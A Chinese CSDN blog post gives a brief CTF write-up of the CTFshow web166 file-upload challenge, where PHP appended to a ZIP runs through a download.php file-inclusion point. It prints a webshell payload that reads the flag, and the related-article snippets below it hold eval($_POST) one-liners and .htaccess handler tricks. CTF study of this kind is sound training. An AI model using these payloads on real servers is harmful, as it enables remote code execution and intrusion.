CTFshow 文件上传 web166

最新推荐文章于 2024-08-12 21:16:37 发布
最新推荐文章于 2024-08-12 21:16:37 发布
阅读量481 收藏
点赞数
分类专栏: CTFshow 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/122973231
版权
本文讲述了在CTF比赛中遇到的一个文件上传问题。通过分析网页源代码,发现只能上传ZIP文件,并且在尝试上传后,URL路径暗示了文件包含漏洞。通过在ZIP文件尾部添加shell,成功触发并下载了含有Flag的HTML页面。
摘要由CSDN通过智能技术生成

目录

思路

直接在bp发包一直失败,没什么思路,查看了一下网页源代码,提示上传zip

在这里插入图片描述
直接上传zip,显示下载文件,抓包发现url路径疑似文件包含点,返回的是一个html页面
在这里插入图片描述
在上传的zip尾部添加shell,访问/upload/download.php?file=1048f28ab4d2da951869bc5579e7525c.zip抓包拿到flag

<?php phpinfo();system("tac ../f*")
最低0.47元/天 解锁文章
Kradress
关注
专栏目录
ctfshow web入门文件上传
m0_61448651的博客
01-12 681
ctfshow web入门文件上传
Centos Docker部署教程_docker部署centos
2401_84281655的博客
04-28 570
docker pull ubuntu:后面跟docker hub的版本参数。docker pull ubuntu #自动拉取最新版本ubuntu。大纲路线、讲解视频,并且后续会持续更新**
小迪安全-Web攻防-文件上传-二次渲染&.htacces&变异免杀
最新发布
weixin_43809272的博客
08-12 1837
只要一直访问路径且传输代码,并且在旧文件上传成功的那一刹那,访问到该文件就可以执行代码创建新的文件,将新文件放到根目录/不会自动删除的目录下/直接利用代码查看flag。条件竞争:如果上传的文件在upload路径下会被删除,那么可以在删除前一直访问这个路径下要上传的文件,并且传输代码(利用代码创建一个新文件)。若为“后门代码删除”的情况,则可将后门代码写入到不会删除的文件中进行处置。1、什么都删除:文件实际上是删除成功的,但是被系统或者后台删除,那么在没删除的之前,文件时存在,可以进行正常的操作。
ctfshow -web文件上传
m0_72898152的博客
02-02 921
ctf
ctfshow---文件上传
fainpo的博客
04-10 643
来到文件上传了。
ctfshow-web入门-文件上传web166web167)&(web168-web170)免杀绕过
Welcome To Myon'Blog !
07-11 1123
查看源码,前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包,使用记事本编辑,在其内容里插入一句话木马:上传该压缩包,上传成功后点击下载文件,使用 burpsuite 抓包:我这里木马内容用的 request ,就在 get 里执行 ls 没什么问题,但是读取 flag 时识别有点问题,最好使用 post 请求,因此将请求方法改为 post ,将 file 的内容还原到上面。
Web】CTFSHOW 文件上传刷题记录(全)
uuzeray的博客
01-16 1738
期末考完终于可以好好学ctf了,先把这些该回顾的回顾完,直接rushjava!
CTFshow 文件上传 web162
Kradress的博客
02-15 2149
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
CTFshow 文件上传 web153
Kradress的博客
02-15 1798
目录思路总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上传配置文件,访问upload,发现有可执行文件index.php,可以用上传.user.ini来进行文件包含(题目是nginx) user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。 条件: 服务器脚本语言为PHP
CTFshow 文件上传 web164
Kradress的博客
02-16 961
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传 https://github.com/huntergregal/PNG-IDAT-Payload-Generator 虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单 .user.ini也无法正常上传,应该有其他的点可以利用. 直接在网站上上传图片马后,发现显示查看图片 点击查看图片后,跳转到/download.php?imag
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
CTFshow 文件上传 web167
Kradress的博客
02-16 372
目录思路总结 思路 根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache 可以直接上传phtml,但是文件没有被成功解析.这时候可以上传.htaccess,对所有文件进行php解析 <?php echo 123;eval($_POST['kradress']);?> .htaccess Sethandler application/x-httpd-php <!-将该
ctfshow-web入门-文件上传web164、web165)图片二次渲染绕过
Welcome To Myon'Blog !
07-09 1528
web164 和 web165 的利用点都是二次渲染,一个是 png,一个是 jpg二次渲染:网站服务器会对上传的图片进行二次处理,对文件内容进行替换更新,根据原有图片生成一个新的图片,这样就会改变文件原有的一些内容,我们需要将一句话木马插入到数据不会被改变的位置,确保一句话木马不会受到二次渲染的影响。
CTFshow 文件上传 web165
Kradress的博客
02-16 633
目录思路总结 思路 上传jpg图片,返回包可以看出经过了二次渲染 试了很多次,群里的jpg哪来也没成功,放弃了 <?php $miniPayload = '<?php echo 123;eval($_POST[0]);?>'; if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) { die('php-gd is not installed'); }
CTFSHOW文件上传151-170
qq_68233961的博客
02-26 1137
CTFshow文件上传
ctfshow-web入门-文件上传
yingu9267的博客
05-06 227
访问url/upload即可(upload自动调用index.php,index.php又自动调用1.png中的system代码(.user.ini设置的结果))上传包含恶意代码的1.png(png图片里有php后门代码,但是图片格式不能被触发,所以连接不上后门,要通过.user.ini才能以php形式运行)过滤了“[]”,使用
ctfshow web162-170_ctfshow162题(1),2024年最新2024网络安全春招面试经历
2401_84164503的博客
04-09 856
这就给了我们一种思路:我们把原来的图片和二次渲染后的图片进行对比,找到不改变的地方,把我们的后门代码植入到这个地方中,再进行上传。参考贴脚本:php$y += 3) {?这脚本生成的后门是用get方式传递system post传递命令运行脚本,生成了一个png,上传成功。注意:这里图片的地址是用php代码包含的。所以才可以执行php代码。如果不是这样,而是直接用路径显示,我们就需要使用.user.ini文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值